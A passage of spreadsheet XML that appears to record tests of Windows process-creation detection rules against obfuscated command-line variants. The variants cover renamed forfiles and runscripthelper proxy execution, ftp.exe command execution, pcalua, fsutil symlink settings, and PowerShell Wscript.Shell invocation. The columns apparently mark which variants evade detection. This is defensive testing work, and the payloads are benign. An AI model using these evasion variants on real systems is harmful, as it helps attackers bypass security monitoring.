          <t>Forfiles Command Execution (9aa5106d-bce3-4b13-86df-3a20f1d5cf0b); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1588" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1588" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1589" ht="15.75" customHeight="1" s="42">
      <c r="A1589" s="43" t="n"/>
      <c r="B1589" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_forfiles_proxy_execution_</t>
        </is>
      </c>
      <c r="C1589" s="44" t="inlineStr">
        <is>
          <t>Forfiles Command Execution</t>
        </is>
      </c>
      <c r="D1589" s="44" t="inlineStr">
        <is>
          <t>9aa5106d-bce3-4b13-86df-3a20f1d5cf0b</t>
        </is>
      </c>
      <c r="E1589" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\forfiles.exe C:\Users\Public\not_forfiles.exe &amp;&amp; C:\Users\Public\not_forfiles.exe /p c:\windows\system32 /M notepad.exe -"c" "calc.exe"</t>
        </is>
      </c>
      <c r="F1589" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1589" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1589" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1589" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1589" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1589" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1590" ht="15.75" customHeight="1" s="42">
      <c r="A1590" s="43" t="n"/>
      <c r="B1590" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_forfiles_proxy_execution_</t>
        </is>
      </c>
      <c r="C1590" s="44" t="inlineStr">
        <is>
          <t>Forfiles Command Execution</t>
        </is>
      </c>
      <c r="D1590" s="44" t="inlineStr">
        <is>
          <t>9aa5106d-bce3-4b13-86df-3a20f1d5cf0b</t>
        </is>
      </c>
      <c r="E1590" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\forfiles.exe C:\Users\Public\not_forfiles.exe &amp;&amp; C:\Users\Public\not_forfiles.exe /P c:\windows\system32 /m notepad.exe /"c" "calc.exe"</t>
        </is>
      </c>
      <c r="F1590" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1590" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1590" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1590" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1590" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1590" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1591" ht="15.75" customHeight="1" s="42">
      <c r="A1591" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B1591" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_symlinkevaluation</t>
        </is>
      </c>
      <c r="C1591" s="44" t="inlineStr">
        <is>
          <t>Fsutil Behavior Set SymlinkEvaluation</t>
        </is>
      </c>
      <c r="D1591" s="44" t="inlineStr">
        <is>
          <t>c0b2768a-dd06-4671-8339-b16ca8d1f27f</t>
        </is>
      </c>
      <c r="E1591" s="44" t="inlineStr">
        <is>
          <t>fsutil behavior set "Symlink""Evaluation" R2L:1</t>
        </is>
      </c>
      <c r="F1591" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1591" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1591" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1591" s="43" t="n"/>
      <c r="J1591" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K1591" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1592" ht="15.75" customHeight="1" s="42">
      <c r="A1592" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B1592" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_symlinkevaluation</t>
        </is>
      </c>
      <c r="C1592" s="44" t="inlineStr">
        <is>
          <t>Fsutil Behavior Set SymlinkEvaluation</t>
        </is>
      </c>
      <c r="D1592" s="44" t="inlineStr">
        <is>
          <t>c0b2768a-dd06-4671-8339-b16ca8d1f27f</t>
        </is>
      </c>
      <c r="E1592" s="44" t="inlineStr">
        <is>
          <t>fsutil behavior   set   SymlinkEvaluation R2L:1</t>
        </is>
      </c>
      <c r="F1592" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1592" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1592" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1592" s="44" t="inlineStr">
        <is>
          <t>Fsutil Behavior Set SymlinkEvaluation (c0b2768a-dd06-4671-8339-b16ca8d1f27f)</t>
        </is>
      </c>
      <c r="J1592" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K1592" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1593" ht="15.75" customHeight="1" s="42">
      <c r="A1593" s="43" t="n"/>
      <c r="B1593" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ftp_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C1593" s="44" t="inlineStr">
        <is>
          <t>Potential Arbitrary Command Execution Via FTP.EXE</t>
        </is>
      </c>
      <c r="D1593" s="44" t="inlineStr">
        <is>
          <t>06b401f4-107c-4ff9-947f-9ec1e7649f1e</t>
        </is>
      </c>
      <c r="E1593" s="44" t="inlineStr">
        <is>
          <t>echo !calc.exe &gt; script.txt &amp;&amp; ftp -A &lt; script.txt</t>
        </is>
      </c>
      <c r="F1593" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1593" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1593" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1593" s="43" t="inlineStr">
        <is>
          <t>Read Contents From Stdin Via Cmd.EXE (241e802a-b65e-484f-88cd-c2dc10f9206d); Potential Arbitrary Command Execution Via FTP.EXE (06b401f4-107c-4ff9-947f-9ec1e7649f1e)</t>
        </is>
      </c>
      <c r="J1593" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1593" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1594" ht="15.75" customHeight="1" s="42">
      <c r="A1594" s="43" t="n"/>
      <c r="B1594" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ftp_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C1594" s="44" t="inlineStr">
        <is>
          <t>Potential Arbitrary Command Execution Via FTP.EXE</t>
        </is>
      </c>
      <c r="D1594" s="44" t="inlineStr">
        <is>
          <t>06b401f4-107c-4ff9-947f-9ec1e7649f1e</t>
        </is>
      </c>
      <c r="E1594" s="44" t="inlineStr">
        <is>
          <t>echo !calc.exe &gt; script.txt &amp;&amp; ftp -a &lt; script.txt</t>
        </is>
      </c>
      <c r="F1594" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1594" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1594" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1594" s="43" t="inlineStr">
        <is>
          <t>Read Contents From Stdin Via Cmd.EXE (241e802a-b65e-484f-88cd-c2dc10f9206d); Potential Arbitrary Command Execution Via FTP.EXE (06b401f4-107c-4ff9-947f-9ec1e7649f1e)</t>
        </is>
      </c>
      <c r="J1594" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1594" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1595" ht="15.75" customHeight="1" s="42">
      <c r="A1595" s="43" t="n"/>
      <c r="B1595" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ftp_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C1595" s="44" t="inlineStr">
        <is>
          <t>Potential Arbitrary Command Execution Via FTP.EXE</t>
        </is>
      </c>
      <c r="D1595" s="44" t="inlineStr">
        <is>
          <t>06b401f4-107c-4ff9-947f-9ec1e7649f1e</t>
        </is>
      </c>
      <c r="E1595" s="44" t="inlineStr">
        <is>
          <t>echo !calc.exe &gt; script.txt &amp;&amp; ftp -"A" &lt; script.txt</t>
        </is>
      </c>
      <c r="F1595" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1595" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1595" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1595" s="43" t="inlineStr">
        <is>
          <t>Read Contents From Stdin Via Cmd.EXE (241e802a-b65e-484f-88cd-c2dc10f9206d)</t>
        </is>
      </c>
      <c r="J1595" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1595" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1596" ht="15.75" customHeight="1" s="42">
      <c r="A1596" s="43" t="n"/>
      <c r="B1596" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ftp_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C1596" s="44" t="inlineStr">
        <is>
          <t>Potential Arbitrary Command Execution Via FTP.EXE</t>
        </is>
      </c>
      <c r="D1596" s="44" t="inlineStr">
        <is>
          <t>06b401f4-107c-4ff9-947f-9ec1e7649f1e</t>
        </is>
      </c>
      <c r="E1596" s="44" t="inlineStr">
        <is>
          <t>echo !calc.exe &gt; script.txt &amp;&amp; ftp /"A" &lt; script.txt</t>
        </is>
      </c>
      <c r="F1596" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1596" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1596" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1596" s="43" t="inlineStr">
        <is>
          <t>Read Contents From Stdin Via Cmd.EXE (241e802a-b65e-484f-88cd-c2dc10f9206d)</t>
        </is>
      </c>
      <c r="J1596" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1596" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1597" ht="15.75" customHeight="1" s="42">
      <c r="A1597" s="43" t="n"/>
      <c r="B1597" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_process_patterns</t>
        </is>
      </c>
      <c r="C1597" s="44" t="inlineStr">
        <is>
          <t>Potential CobaltStrike Process Patterns</t>
        </is>
      </c>
      <c r="D1597" s="44" t="inlineStr">
        <is>
          <t>f35c5d71-b489-4e22-a115-f003df287317</t>
        </is>
      </c>
      <c r="E1597" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /k whoami</t>
        </is>
      </c>
      <c r="F1597" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1597" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1597" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1597" s="43" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J1597" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1597" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1598" ht="15.75" customHeight="1" s="42">
      <c r="A1598" s="43" t="n"/>
      <c r="B1598" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_process_patterns</t>
        </is>
      </c>
      <c r="C1598" s="44" t="inlineStr">
        <is>
          <t>Potential CobaltStrike Process Patterns</t>
        </is>
      </c>
      <c r="D1598" s="44" t="inlineStr">
        <is>
          <t>f35c5d71-b489-4e22-a115-f003df287317</t>
        </is>
      </c>
      <c r="E1598" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"k" whoami</t>
        </is>
      </c>
      <c r="F1598" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1598" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1598" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1598" s="43" t="n"/>
      <c r="J1598" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1598" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1599" ht="15.75" customHeight="1" s="42">
      <c r="A1599" s="43" t="n"/>
      <c r="B1599" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_process_patterns</t>
        </is>
      </c>
      <c r="C1599" s="44" t="inlineStr">
        <is>
          <t>Potential CobaltStrike Process Patterns</t>
        </is>
      </c>
      <c r="D1599" s="44" t="inlineStr">
        <is>
          <t>f35c5d71-b489-4e22-a115-f003df287317</t>
        </is>
      </c>
      <c r="E1599" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"k" whoami</t>
        </is>
      </c>
      <c r="F1599" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1599" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1599" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1599" s="43" t="n"/>
      <c r="J1599" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1599" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1600" ht="15.75" customHeight="1" s="42">
      <c r="A1600" s="43" t="n"/>
      <c r="B1600" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_process_patterns</t>
        </is>
      </c>
      <c r="C1600" s="44" t="inlineStr">
        <is>
          <t>Potential CobaltStrike Process Patterns</t>
        </is>
      </c>
      <c r="D1600" s="44" t="inlineStr">
        <is>
          <t>f35c5d71-b489-4e22-a115-f003df287317</t>
        </is>
      </c>
      <c r="E1600" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /K whoami</t>
        </is>
      </c>
      <c r="F1600" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1600" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1600" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1600" s="43" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J1600" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1600" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1601" ht="15.75" customHeight="1" s="42">
      <c r="A1601" s="43" t="n"/>
      <c r="B1601" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pcalua</t>
        </is>
      </c>
      <c r="C1601" s="44" t="inlineStr">
        <is>
          <t>Use of Pcalua For Execution</t>
        </is>
      </c>
      <c r="D1601" s="44" t="inlineStr">
        <is>
          <t>0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2</t>
        </is>
      </c>
      <c r="E1601" s="44" t="inlineStr">
        <is>
          <t>pcalua.exe "-a" C:\Windows\System32\calc.exe</t>
        </is>
      </c>
      <c r="F1601" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1601" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1601" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1601" s="43" t="n"/>
      <c r="J1601" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1601" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1602" ht="15.75" customHeight="1" s="42">
      <c r="A1602" s="43" t="n"/>
      <c r="B1602" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pcalua</t>
        </is>
      </c>
      <c r="C1602" s="44" t="inlineStr">
        <is>
          <t>Use of Pcalua For Execution</t>
        </is>
      </c>
      <c r="D1602" s="44" t="inlineStr">
        <is>
          <t>0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2</t>
        </is>
      </c>
      <c r="E1602" s="44" t="inlineStr">
        <is>
          <t>pcalua.exe "-a"" C:\Windows\System32\calc.exe</t>
        </is>
      </c>
      <c r="F1602" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1602" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1602" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1602" s="43" t="n"/>
      <c r="J1602" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1602" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1603" ht="15.75" customHeight="1" s="42">
      <c r="A1603" s="43" t="n"/>
      <c r="B1603" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pcalua</t>
        </is>
      </c>
      <c r="C1603" s="44" t="inlineStr">
        <is>
          <t>Use of Pcalua For Execution</t>
        </is>
      </c>
      <c r="D1603" s="44" t="inlineStr">
        <is>
          <t>0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2</t>
        </is>
      </c>
      <c r="E1603" s="44" t="inlineStr">
        <is>
          <t>pcalua.exe "-A" C:\Windows\System32\calc.exe</t>
        </is>
      </c>
      <c r="F1603" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1603" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1603" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1603" s="43" t="n"/>
      <c r="J1603" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1603" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1604" ht="15.75" customHeight="1" s="42">
      <c r="A1604" s="43" t="n"/>
      <c r="B1604" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pcalua</t>
        </is>
      </c>
      <c r="C1604" s="44" t="inlineStr">
        <is>
          <t>Use of Pcalua For Execution</t>
        </is>
      </c>
      <c r="D1604" s="44" t="inlineStr">
        <is>
          <t>0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2</t>
        </is>
      </c>
      <c r="E1604" s="44" t="inlineStr">
        <is>
          <t>pcalua.exe -"aC:\Windows\System32\calc.exe"</t>
        </is>
      </c>
      <c r="F1604" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1604" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1604" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1604" s="43" t="n"/>
      <c r="J1604" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1604" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1605" ht="15.75" customHeight="1" s="42">
      <c r="A1605" s="43" t="n"/>
      <c r="B1605" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pcalua</t>
        </is>
      </c>
      <c r="C1605" s="44" t="inlineStr">
        <is>
          <t>Use of Pcalua For Execution</t>
        </is>
      </c>
      <c r="D1605" s="44" t="inlineStr">
        <is>
          <t>0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2</t>
        </is>
      </c>
      <c r="E1605" s="44" t="inlineStr">
        <is>
          <t>pcalua.exe /"aC:\Windows\System32\calc.exe"</t>
        </is>
      </c>
      <c r="F1605" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1605" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1605" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1605" s="43" t="n"/>
      <c r="J1605" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1605" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1606" ht="15.75" customHeight="1" s="42">
      <c r="A1606" s="43" t="n"/>
      <c r="B1606" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pcalua</t>
        </is>
      </c>
      <c r="C1606" s="44" t="inlineStr">
        <is>
          <t>Use of Pcalua For Execution</t>
        </is>
      </c>
      <c r="D1606" s="44" t="inlineStr">
        <is>
          <t>0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2</t>
        </is>
      </c>
      <c r="E1606" s="44" t="inlineStr">
        <is>
          <t>pcalua.exe /a C:\Windows\System32\calc.exe</t>
        </is>
      </c>
      <c r="F1606" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1606" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1606" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1606" s="43" t="n"/>
      <c r="J1606" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1606" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1607" ht="15.75" customHeight="1" s="42">
      <c r="A1607" s="43" t="n"/>
      <c r="B1607" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pcalua</t>
        </is>
      </c>
      <c r="C1607" s="44" t="inlineStr">
        <is>
          <t>Use of Pcalua For Execution</t>
        </is>
      </c>
      <c r="D1607" s="44" t="inlineStr">
        <is>
          <t>0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2</t>
        </is>
      </c>
      <c r="E1607" s="44" t="inlineStr">
        <is>
          <t>pcalua.exe /"a" C:\Windows\System32\calc.exe</t>
        </is>
      </c>
      <c r="F1607" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1607" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1607" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1607" s="43" t="n"/>
      <c r="J1607" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1607" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1608" ht="15.75" customHeight="1" s="42">
      <c r="A1608" s="43" t="n"/>
      <c r="B1608" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pcalua</t>
        </is>
      </c>
      <c r="C1608" s="44" t="inlineStr">
        <is>
          <t>Use of Pcalua For Execution</t>
        </is>
      </c>
      <c r="D1608" s="44" t="inlineStr">
        <is>
          <t>0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2</t>
        </is>
      </c>
      <c r="E1608" s="43" t="inlineStr">
        <is>
          <t>pcalua.exe /A C:\Windows\System32\calc.exe</t>
        </is>
      </c>
      <c r="F1608" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1608" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1608" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1608" s="43" t="n"/>
      <c r="J1608" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1608" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1609" ht="15.75" customHeight="1" s="42">
      <c r="A1609" s="43" t="n"/>
      <c r="B1609" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_runscripthelper</t>
        </is>
      </c>
      <c r="C1609" s="44" t="inlineStr">
        <is>
          <t>Suspicious Runscripthelper.exe</t>
        </is>
      </c>
      <c r="D1609" s="44" t="inlineStr">
        <is>
          <t>eca49c87-8a75-4f13-9c73-a5a29e845f03</t>
        </is>
      </c>
      <c r="E1609" s="44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F1609" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1609" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1609" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1609" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Names (efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1609" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1609" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1610" ht="15.75" customHeight="1" s="42">
      <c r="A1610" s="43" t="n"/>
      <c r="B1610" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_runscripthelper</t>
        </is>
      </c>
      <c r="C1610" s="44" t="inlineStr">
        <is>
          <t>Suspicious Runscripthelper.exe</t>
        </is>
      </c>
      <c r="D1610" s="44" t="inlineStr">
        <is>
          <t>eca49c87-8a75-4f13-9c73-a5a29e845f03</t>
        </is>
      </c>
      <c r="E1610" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\runscripthelper.exe C:\Windows\Temp\not_suspicious.exe &amp;&amp; C:\Windows\Temp\not_suspicious.exe surfacecheck C:\path\to\script.ps1 C:\Windows\Temp</t>
        </is>
      </c>
      <c r="F1610" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1610" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1610" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1610" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1610" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1610" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1611" ht="15.75" customHeight="1" s="42">
      <c r="A1611" s="43" t="n"/>
      <c r="B1611" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_inline_vbscript</t>
        </is>
      </c>
      <c r="C1611" s="44" t="inlineStr">
        <is>
          <t>Wscript Shell Run In CommandLine</t>
        </is>
      </c>
      <c r="D1611" s="44" t="inlineStr">
        <is>
          <t>2c28c248-7f50-417a-9186-a85b223010ee</t>
        </is>
      </c>
      <c r="E1611" s="44" t="inlineStr">
        <is>
          <t>wscript.exe C:\path\to\malicious_script.vbs</t>
        </is>
      </c>
      <c r="F1611" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1611" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1611" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1611" s="44" t="n"/>
      <c r="J1611" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K1611" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1612" ht="15.75" customHeight="1" s="42">
      <c r="A1612" s="43" t="n"/>
      <c r="B1612" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_inline_vbscript</t>
        </is>
      </c>
      <c r="C1612" s="44" t="inlineStr">
        <is>
          <t>Wscript Shell Run In CommandLine</t>
        </is>
      </c>
      <c r="D1612" s="44" t="inlineStr">
        <is>
          <t>2c28c248-7f50-417a-9186-a85b223010ee</t>
        </is>
      </c>
      <c r="E1612" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$s = 'Wscript.Shell'; $o = New-Object -ComObject $s; $m = 'Run'; $o.$m.Invoke('calc.exe')"</t>
        </is>
      </c>
      <c r="F1612" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1612" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1612" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1612" s="44" t="n"/>
      <c r="J1612" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1612" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1613" ht="15.75" customHeight="1" s="42">
      <c r="A1613" s="43" t="n"/>
      <c r="B1613" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_inline_vbscript</t>
        </is>
      </c>
      <c r="C1613" s="44" t="inlineStr">
        <is>
          <t>Wscript Shell Run In CommandLine</t>
        </is>
      </c>
      <c r="D1613" s="44" t="inlineStr">
        <is>
          <t>2c28c248-7f50-417a-9186-a85b223010ee</t>
        </is>
      </c>
      <c r="E1613" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmAND "$s = 'Wscript.Shell'; $o = New-Object -ComObject $s; $m = 'Run'; $o.$m.Invoke('calc.exe')"</t>
        </is>
      </c>
      <c r="F1613" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1613" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1613" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1613" s="43" t="n"/>
      <c r="J1613" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1613" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1614" ht="15.75" customHeight="1" s="42">
      <c r="A1614" s="43" t="n"/>
      <c r="B1614" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_inline_vbscript</t>
        </is>
      </c>
      <c r="C1614" s="44" t="inlineStr">
        <is>
          <t>Wscript Shell Run In CommandLine</t>
        </is>
      </c>
      <c r="D1614" s="44" t="inlineStr">
        <is>
          <t>2c28c248-7f50-417a-9186-a85b223010ee</t>
        </is>
      </c>
      <c r="E1614" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmaNd "$s = 'Wscript.Shell'; $o = New-Object -ComObject $s; $m = 'Run'; $o.$m.Invoke('calc.exe')"</t>
        </is>
      </c>
      <c r="F1614" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1614" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1614" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1614" s="44" t="n"/>
      <c r="J1614" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1614" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1615" ht="15.75" customHeight="1" s="42">
      <c r="A1615" s="43" t="n"/>
      <c r="B1615" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_inline_vbscript</t>
        </is>
      </c>
      <c r="C1615" s="44" t="inlineStr">
        <is>
          <t>Wscript Shell Run In CommandLine</t>
        </is>
      </c>
      <c r="D1615" s="44" t="inlineStr">
        <is>
          <t>2c28c248-7f50-417a-9186-a85b223010ee</t>
        </is>
      </c>
      <c r="E1615" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$s = 'Wscript.Shell'; $o = New-Object -ComObject $s; $m = 'Run'; $o.$m.Invoke('calc.exe')"</t>
        </is>
      </c>
      <c r="F1615" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1615" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1615" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1615" s="44" t="n"/>
      <c r="J1615" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1615" s="44" t="b">
        <v>1</v>
      </c>
    </row>
